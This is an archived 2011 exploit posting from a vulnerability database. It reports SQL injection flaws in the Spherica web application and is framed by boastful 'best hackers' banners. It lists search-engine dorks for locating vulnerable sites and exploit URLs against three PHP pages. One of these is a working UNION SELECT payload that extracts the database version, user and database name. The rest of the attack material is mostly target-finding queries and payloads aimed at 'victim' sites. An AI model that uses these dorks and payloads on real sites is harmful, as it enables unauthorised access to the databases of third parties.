Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26904
HistoryAug 27, 2011 - 12:00 a.m.

Spherica Remote SQL injection Vulnerability

2011-08-2700:00:00
vulners.com
101

################################ IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################

Remote SQL injection Vulnerability

Spherica

###############################################################
###############################################################
###############################################################
###############################################################

AuTh0r : Ehsan_Hp200

H0ME : www.ehsanhp.blogsky.com

Email : [email protected]

Vendor : http://www.spherica.it/

Persian Gulf 4 Ever!

#############################
#############################
#############################
#############################
#############################

Dork : "powered by spherica" "inurl:prodotto.php?idcatalogo="

Exploite:

www.victim.com/prodotto.php?idcatalogo=[SQL]

Dork : "powered by spherica" "inurl:dettaglio_galleria.php?id="

Exploite:

www.victim.com/dettaglio_galleria.php?id=-Null union select Null,version(),user(),database()–

Dork : "powered by spherica" "inurl:dettagli_prodotti.php?id="

Exploite :

www.victim.com/dettagli_prodotti.php?id=[SQl]

#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################